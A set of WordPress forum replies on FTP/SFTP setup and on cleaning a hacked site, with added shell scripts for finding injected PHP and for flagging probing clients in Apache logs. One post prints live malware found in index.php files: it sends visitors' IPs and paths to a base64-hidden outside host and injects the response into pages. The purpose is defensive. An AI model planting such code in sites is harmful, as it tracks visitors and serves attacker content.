GaryDev
Forum Replies Created
Forum: Fixing WordPress
In reply to: ftp account creation
Update:
I went into the ‘virtual server’ location where WordPress was installed, and changed both the owner and group for all files and folders. This was done using command prompt access by issuing the command “chown -RH UserOwnerName:GroupName /var/www/htmlwebsiteInstance”
So for example, if the owner of the site is, say, the user account Fred, the group Fred is in is www-data, and the instance of the website is called FredsSite, use the command
chown -RH Fred:www-data /var/www/FredsSite
As a side note, the user “Fred” was created in the Webmin Users & Groups configuration, was given a very strong password, had their initial directory specified to be /var/www/FredsSite, and had the shell set up to be /bin/bash.
I then edited the SSH server configuration file, again using the Webmin tools, and added in the following text:
Match user Fred
# The following two directives force Fred to become chrooted
# and only have sftp available. No other chroot setup is required.
ChrootDirectory /var/www/FredsSite/
ForceCommand internal-sftp
# For additional paranoia, disallow all types of port forwardings.
# AllowTcpForwarding no
# GatewayPorts no
# X11Forwarding no
Note, the above comes from another website’s instruction page, and states that this will allow SFTP connections. In my case, under Ubuntu 10.4 LTS, the SFTP login was not accepted, and I had to revert to plain FTP in order to connect using WinSCP. Not THAT big of a detail, but I’m just saying this is what I found. If someone has a hint that will allow the SFTP side to work, I’d appreciate the advice.
Anyway, to continue on… I then edited the wordpress config file, and stored the appropriate commands to allow the website owner the ability to not have to enter the FTP commands for getting and installing updates. In my case, it was important to use the full domain name rather than “localhost” as the connection for FTP. This is described in http://codex.wordpress.org/Editing_wp-config.php
With these changes made, Fred can now log in to the administration side of the WordPress system, and updates for plugins etc. are now correctly downloaded and installed without issues.
Forum: Fixing WordPress
In reply to: ftp account creation
I am not going to play “experiment” with the entire VM machine, sorry. I have no issues with killing the one folder and contents for the base ‘virtual web server’ that Apache is currently configured for, and then re-installing WordPress using an account that “belongs” to that virtual web server.
I believe this is a simple matter of setting up a proper user in the FTP section. Or maybe it could be as simple as using the domain name instead of localhost.
Thanks for trying, but your advice is not workable.
Forum: Fixing WordPress
In reply to: ftp account creation
I checked Virtualmin, basically an add-on for Webmin, which I use. From a quick glance over the docs for it, it would seem like it creates a new virtual machine, totally independent of the main machine. I could be wrong in this presumption.
I don’t want a VM within a VM… the apache web server has already created a “virtual” website, which works fine. We have a total of 3 different web sites running, including the main system site. Naturally, I fear adding in virtualmin at this point, because if it does make “isolated” machines, then I will lose everything that is setup now. Again, I could be wrong…
For what it’s worth, there are no mail services installed other than sendmail for the base system. None of the other 2 websites have any specific email setups. All email is processed by other sources. And wordpress has no issues with sending email notifications since I’ve already received a pile of them about spam comments.. (lol/sigh)
Just sayin 🙂
Forum: Fixing WordPress
In reply to: ftp account creation
I realize the faults. I fully intend to nuke everything and start from scratch again. No clue what Virtualmin is, and I’m not sure I need to add that to open more potential back doors and hack attempts. Same reason I don’t use phpMyAdmin either. I see the system logs and the number of times people try to access that.
If I can’t accomplish what I need in webmin, then I can ssh in with putty and do things at the command prompt. The issue is, as I stated, I’m not a strong linux type person. 🙂
Forum: Everything else WordPress
In reply to: Site hack fixing
No question WinGrep does a lot more. 🙂 For my purposes, way more than I needed…
With that said, the above link now also contains the full source code for the program.
To each their own. 🙂
Gary
(btw, if the Mods want to extract the functions/text/links here, and put it into a sticky some place, be my guest. My only goal was to offer back to the community something that was valuable to me. Cheers!)
Forum: Everything else WordPress
In reply to: Site hack fixing
Thanks for the replies. I have never heard of WinGrep before, so I went and peeked at it. It certainly is impressive, and has some nice features to it.
Even after playing with it for a while, I found it a little confusing with all of the options. I never tried to “edit/replace” with it, because I am leery of modifying code ‘automatically’. So many things could be in so many places, and if you are doing a partial search (I think most people do) then who knows. I also found it kept giving me errors when I selected to edit a file, something about not running a program in a temp folder… but it did open up the selected source, using notepad.
Anyway…
My program runs just as fast, and keeps things VERY simple. It was designed to help this community specifically, and not as a general “do it all program”. Of course, once I release the source code (hey, this isn’t complicated stuff) then folks can of course, do what they want.
To start with, I just have the program and a doc file in a zip, posted in a phpBB forum on a site that I assist with managing. Don’t let the link scare you, you will not be pestered to play games (this site is like the old MSN Gaming Zone was, playing the old CDROM type games), nor will you be required to create an account to download the zip.
I look forward to hearing comments… Not sure how this community would take to stuffing the forums here, but I will check back from time to time. I do check our site daily so… anyway, suit yourself.
http://www.digitalbloodsports.com/forums/viewtopic.php?f=3&t=557
Thanks for your time 🙂
Gary
Forum: Fixing WordPress
In reply to: Site hacked
Nice… 🙂 The key of course, is the shell access. And hoping you did it right. Of course, one made a backup before too, right? LOL.
Doing this stuff is scary for many people who don’t understand things, and maybe working in a Windows environment on backup site files (the smart thing to do always.. the backups, not Windows)
I did write a simple utility for windows folks, the post is here:
http://wordpress.org/support/topic/site-hack-fixing
Hoping someone from the WordPress group will be able to take my stuff and offer it up.
Forum: Fixing WordPress
In reply to: Site hacked
Thanks 🙂
Forum: Fixing WordPress
In reply to: Site hacked
For the Mod, thanks for the understanding.
Question for Mickey 🙂 You’ve (and others) been quite patient, I must say thanks to all for the advice and assistance.
I know the ‘bulk’ of this issue is based on the timthumb.php file, and I’ve made sure those were updated to the latest code. I found the hacked results code to appear in both index.php and footer.php (in pretty much every folder where there are those files). I’ve been asked to look at a few more sites (outside of the main server I was working on) that have the same hack code running, and I’ve done a search using cPanel file manager for ‘thumb’ and I’ve found no thumb.php or timthumb.php any where. Clearly there is more happening… are you aware of other things that are also being done to cause this? I’m not sure what to google… if you have a link or two that can point me in the right direction, I’d deeply appreciate it.
Thanks again. 🙂
Gary
Forum: Fixing WordPress
In reply to: Site hacked
It wasn’t an iFrame attack, the code was in plain view in the majority of the index.php files… even the ones that had an ’empty’ index.php file.
As for SwansonPhotos… you know dude, I am not a wordpress person, but I have been doing computers for over 30 years. I went in to help out, free of charge, to assist in getting the breast cancer site up and running.
As I stated, “apologies if this isn’t done right”… I have no clue if this is new or old or anything else. My desire was simply to assist this community with the results of my findings. I wasn’t aware of any “rules” in regards to how to do that. This thread was created “out of respect” in trying to inform the community. People like you make people like me not even bother to be involved. I’m sure someone will point a link to the rules in this thread, but thanks to you, I highly doubt I will be back.
Forum: Fixing WordPress
In reply to: Site hacked
Well.. I have some progress to report. The site lead (I think) must have made some plugin changes (still checking), but the problem boils down to the main index.php file. The normal code is only a few lines long:

    define('WP_USE_THEMES', true);
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');

In our case there were many extras there, and the appearance of the code made you think “oh, ok.. google stuff”… I will put the code into a code box, so you can see what it was… I will strip off any of the php tags. Naturally, without saying… don’t RUN this code, but hopefully it will assist others in finding ‘bad’ things.

    if (!isset($sRetry)) {
        global $sRetry;
        $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        // Only visitors whose User-Agent contains none of these strings
        // (in practice, browsers such as Firefox and IE) are reported
        if ((strstr($sUserAgent, 'google') == false)
            && (strstr($sUserAgent, 'yahoo') == false)
            && (strstr($sUserAgent, 'baidu') == false)
            && (strstr($sUserAgent, 'msn') == false)
            && (strstr($sUserAgent, 'opera') == false)
            && (strstr($sUserAgent, 'chrome') == false)
            && (strstr($sUserAgent, 'bing') == false)
            && (strstr($sUserAgent, 'safari') == false)
            && (strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) {
                // Create bot analitics
                // The base64 literal hides the call-home URL; the visitor's IP,
                // User-Agent, host name and requested path are sent along with it
                $stCurlLink = base64_decode('aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==')
                    . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                    . '&useragent=' . urlencode($sUserAgent)
                    . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                    . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                    . '&check=' . isset($_GET['look']);
                $stCurlHandle = curl_init($stCurlLink);
            }
        }
        if ($stCurlHandle !== NULL) {
            curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
            $sResult = @curl_exec($stCurlHandle);
            // Whatever the remote server returns is written into the page
            // when its first byte is "O"
            if ($sResult[0] == "O") {
                $sResult[0] = " ";
                echo $sResult;
                // Statistic code end
            }
            curl_close($stCurlHandle);
        }
    }

I’m guessing the big ‘problem’ is the line that does the base64 stuff, and I still don’t know yet what caused it… For the forum operators, if that code is “too much”, I apologize in advance, please feel free to edit it as needed. My only intention is to show what was going on, and where it was found.
NOTE.. this code was in ALL of the index.php files in the various folders… make sure you check them all.
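The injected block quoted in the reply above profiles the visitor's User-Agent, sends the visitor's IP, User-Agent, host name and path to a remote server, and echoes whatever that server returns into the page if the reply starts with "O"; the base64 literal in it decodes to http://hotlogupdate.com/stat/stat.php. The script below is an added example, not code from the post, for hunting that pattern across every PHP file of an installation, since the reply notes the code was present in all index.php files. It assumes three markers appear together in an injected file (base64_decode(, curl_init( and a HTTP_USER_AGENT check), and it decodes each base64 literal handed to base64_decode() so the call-home host is visible without running the code. The sample tree it builds, and the example.invalid callback host in it, are constructed for the demo.

```shell
# Report every PHP file under a directory that carries the injected
# "bot statistic" block, with its decoded call-home URL.
# usage: scan_injected_php /path/to/site   (prints "file<TAB>url" per hit)
scan_injected_php() {
    root=$1
    find "$root" -type f -name '*.php' -print | while IFS= read -r f; do
        # all three markers must be present before a file is flagged
        grep -q 'base64_decode(' "$f"  || continue
        grep -q 'curl_init('     "$f"  || continue
        grep -q 'HTTP_USER_AGENT' "$f" || continue
        # pull each quoted literal passed to base64_decode() and decode it
        # (base64 -d as in GNU coreutils and busybox)
        grep -o "base64_decode( *'[A-Za-z0-9+/=]*' *)" "$f" |
        sed "s|.*'\([A-Za-z0-9+/=]*\)'.*|\1|" |
        while IFS= read -r b64; do
            url=$(printf '%s' "$b64" | base64 -d 2>/dev/null | tr -d '\n\r')
            printf '%s\t%s\n' "$f" "${url:-<undecodable>}"
        done
    done
}

# Constructed sample tree: a clean WordPress index.php and one carrying the
# injected block with a made-up callback host (example.invalid).
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/clean" "$d/infected"
    printf '%s\n' "<?php" "define('WP_USE_THEMES', true);" \
        "require('./wp-blog-header.php');" > "$d/clean/index.php"
    lit=$(printf '%s' 'http://example.invalid/stat/stat.php' | base64 | tr -d '\n')
    {
        printf '%s\n' "<?php"
        printf '%s\n' "if (!isset(\$sRetry)) {"
        printf '%s\n' "  \$sUserAgent = strtolower(\$_SERVER['HTTP_USER_AGENT']);"
        printf '%s\n' "  \$stCurlLink = base64_decode( '$lit').'?ip='.urlencode(\$_SERVER['REMOTE_ADDR']);"
        printf '%s\n' "  \$stCurlHandle = curl_init( \$stCurlLink );"
        printf '%s\n' "}"
        printf '%s\n' "define('WP_USE_THEMES', true);"
        printf '%s\n' "require('./wp-blog-header.php');"
    } > "$d/infected/index.php"
    printf '%s\n' "$d"
}

sample=$(make_sample_tree)
scan_injected_php "$sample"
rm -rf "$sample"
```

Run it against the document root of each site; a hit list with the same decoded host across many files is the signature the reply describes, and the files it names are the ones to restore from a clean copy before chasing the entry point.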
Forum: Fixing WordPress
In reply to: Site hacked
The lady I deal with has several sites she manages for people (she’s really good with WordPress and the ‘make it pretty’ part) and I guess most of those are on Hostgator. And apparently most of those have been attacked with similar problems. I have to sit and wait for the access needed, in order to check the server logs and database, so at this point my hands are tied.
I do have the tools that protect me, but that doesn’t fix the site. So far it hasn’t been blacklisted but it’s certainly not right to just leave it as it is either.
For folks reading this, you really should be looking at your Apache error log file (if you have access to it). Whoever is doing these attacks, they are all using the exact same attack script, and I’ve had several of the following appear from multiple IP addresses (on my gaming webserver site, which has no WP installed):
[client 91.121.145.89] File does not exist: /var/www/html/cms
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/common
[client 91.121.145.89] File does not exist: /var/www/html/phpThumb
[client 91.121.145.89] File does not exist: /var/www/html/libs
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/gallery
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/js
[client 91.121.145.89] File does not exist: /var/www/html/mambots
[client 91.121.145.89] File does not exist: /var/www/html/admin
[client 91.121.145.89] File does not exist: /var/www/html/modules
[client 91.121.145.89] File does not exist: /var/www/html/lib
[client 91.121.145.89] File does not exist: /var/www/html/manager
[client 91.121.145.89] File does not exist: /var/www/html/thumb
[client 91.121.145.89] File does not exist: /var/www/html/global
[client 91.121.145.89] File does not exist: /var/www/html/components
[client 91.121.145.89] File does not exist: /var/www/html/components
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/staticfiles
[client 91.121.145.89] File does not exist: /var/www/html/content
[client 91.121.145.89] File does not exist: /var/www/html/class/phpthumb
[client 91.121.145.89] File does not exist: /var/www/html/admin
[client 91.121.145.89] script '/var/www/html/phpThumb.php' not found or unable to stat
[client 91.121.145.89] File does not exist: /var/www/html/admin
[client 91.121.145.89] File does not exist: /var/www/html/assets
[client 91.121.145.89] File does not exist: /var/www/html/components
[client 91.121.145.89] File does not exist: /var/www/html/components
[client 91.121.145.89] File does not exist: /var/www/html/components
[client 91.121.145.89] File does not exist: /var/www/html/admin
[client 91.121.145.89] File does not exist: /var/www/html/zadmin
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
[client 91.121.145.89] File does not exist: /var/www/html/components
[client 91.121.145.89] File does not exist: /var/www/html/wp-content
Forum: Fixing WordPress
In reply to: Site hacked
hmmm… Interesting. Thanks for the tip on the scanner. I will keep on digging for sure. I administer a gaming website system, Linux box on a VM and I have full root access. Which includes full DB and well, everything. 🙂 The WP site, I can only FTP into the root of the website, and I have no other access (yet).
The script file has been attached after the closing html tag, and it’s there trying to do its dirty work even when logging in directly to the admin section. So that tells me it’s actually on every page generated. The key now, is to find out exactly what is causing it.
I can’t do a full wipe and re-install due to the DB access side, but I did upgrade Nextgen and the theme to the latest releases. I don’t want to run the full wp 3.3.3 update yet. I am more interested in just how it got in, where it’s being stored at.
I have the ‘malware’ site blocked by using peer guardian, so it’s not affecting my system (thankfully)… until I did that, it was sure causing a lot of grief with FireFox. I originally found it from MalwareBytes program, which monitors things… and while it stopped the outgoing side, it still affected Firefox badly. Now that it’s blocked on the main local computer here, I hope to have more luck in finding it.
I’ve also noticed a HUGE increase in Apache HTML errors (on the gaming site where WP is NOT installed)… Have at least three systems now, all appear to be running the same script files to attack with.
*sigh*
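The error-log excerpt posted earlier in this thread, and the "HUGE increase in Apache HTML errors" on the gaming site mentioned in the reply above, are the same thing seen from two angles: one client asking for dozens of paths that do not exist (wp-content, phpThumb, mambots, admin, components) is a CMS probe, not a visitor who mistyped a URL. The script below is an added example, not something from the posts, that turns that observation into a check you can run over an Apache error log: it counts distinct missing paths per client and prints the clients above a threshold. The log lines it carries are constructed samples in Apache 2.2 format; 91.121.145.89 is the address quoted in the excerpt, 203.0.113.7 (documentation address space) stands in for an ordinary visitor, and the threshold of 10 distinct paths is an assumption to tune for your own traffic.

```shell
# List clients that probed for many distinct non-existent paths.
# usage: probe_scanners THRESHOLD < error_log   (prints "ip<TAB>distinct-paths")
probe_scanners() {
    awk -v thr="$1" -v q="'" '
    {
        # the client address sits in "[client 1.2.3.4]"; Apache 2.4 appends ":port"
        if (!match($0, /\[client [^]]*\]/)) next
        ip = substr($0, RSTART + 8, RLENGTH - 9)
        sub(/:[0-9]+$/, "", ip)          # note: would also truncate a bare IPv6 literal
        # a missing file shows up in one of two ways
        if (i = index($0, "File does not exist: "))
            path = substr($0, i + 21)
        else if (index($0, " not found or unable to stat")) {
            split($0, a, q)               # script '/path/to/file.php' not found ...
            path = a[2]
        } else next
        # count each (client, path) pair once, so repeats of wp-content do not inflate it
        if (!((ip, path) in seen)) { seen[ip, path] = 1; n[ip]++ }
    }
    END { for (ip in n) if (n[ip] >= thr) printf "%s\t%d\n", ip, n[ip] }' | sort
}

# Constructed sample: 14 probe lines from one scanner (12 distinct paths,
# including one "script ... not found" form) and two harmless 404s from a visitor.
sample_error_log() {
    cat <<'EOF'
[Tue Apr 24 10:01:02 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/cms
[Tue Apr 24 10:01:02 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/wp-content
[Tue Apr 24 10:01:02 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/wp-content
[Tue Apr 24 10:01:03 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/common
[Tue Apr 24 10:01:03 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/phpThumb
[Tue Apr 24 10:01:03 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/libs
[Tue Apr 24 10:01:04 2012] [error] [client 203.0.113.7] File does not exist: /var/www/html/favicon.ico
[Tue Apr 24 10:01:04 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/gallery
[Tue Apr 24 10:01:04 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/mambots
[Tue Apr 24 10:01:05 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/admin
[Tue Apr 24 10:01:05 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/modules
[Tue Apr 24 10:01:05 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/components
[Tue Apr 24 10:01:06 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/wp-content
[Tue Apr 24 10:01:06 2012] [error] [client 91.121.145.89] script '/var/www/html/phpThumb.php' not found or unable to stat
[Tue Apr 24 10:01:07 2012] [error] [client 203.0.113.7] File does not exist: /var/www/html/robots.txt
[Tue Apr 24 10:01:07 2012] [error] [client 91.121.145.89] File does not exist: /var/www/html/zadmin
EOF
}

sample_error_log | probe_scanners 10
```

On a live server the same function runs as `probe_scanners 10 < /var/log/apache2/error.log`; the addresses it prints are candidates for a firewall rule, and the paths they asked for tell you which components (here timthumb/phpThumb-style scripts) the scanner expects to find.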
Forum: Fixing WordPress
In reply to: Site hacked
Thanks for the tips… I don’t own the site, machine wise, but I believe it’s hosted on HostGator, and there were a lot of problems with many of their sites. According to the site owner, all of the passwords and stuff were changed. I used a program called “Picture Information Extractor” supplied by Picmeta Systems (version 6.1) to view all images in all folders, and I didn’t see anything in meta data that “looked bad”. 99% of the images had no meta data, and only a handful of the images uploaded by the site manager have some simple information about the camera. With that said, those particular images have been on the site from day 1, and nothing has changed in them.
I am a database and desktop developer, not that strong in html related items, so I am doing what I can. There could be an issue with the database, but at this point I don’t have remote access. I will look into asking for that, and see where it goes from there.
As far as I can tell from this point, none of ‘any file’ within the system seems to have the code above as part of the file. I suppose there could be a generator that creates that code, and stuffs it in on the fly. Wherever it is attached, it even runs when logging in directly to the WP control panel.
Thanks for the response, I will take a look at modifying the function code to grab the thumbs… I had thought it was supposed to do that already but apparently not.